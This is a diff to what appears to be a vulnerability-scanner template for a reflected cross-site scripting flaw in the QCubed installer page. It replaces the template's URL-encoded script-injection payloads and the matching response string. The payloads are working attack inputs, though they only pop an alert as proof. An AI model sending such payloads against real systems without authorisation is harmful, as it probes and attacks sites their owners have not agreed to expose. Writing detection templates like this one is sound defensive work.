--- a/vulnerabilities/other/qcubed-xss.yaml
+++ b/vulnerabilities/other/qcubed-xss.yaml
@@ -10,14 +10,14 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3Cscript%3Ealert(document.domain)%3B%3C/script%3E%3C%22"
-      - "{{BaseURL}}/qcubed/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3Cscript%3Ealert(document.domain)%3B%3C/script%3E%3C%22"
+      - "{{BaseURL}}/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+      - "{{BaseURL}}/qcubed/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - '<script>alert(document.domain);</script>'
+          - '</script><script>alert(document.domain)</script>'
         part: body
 
       - type: status
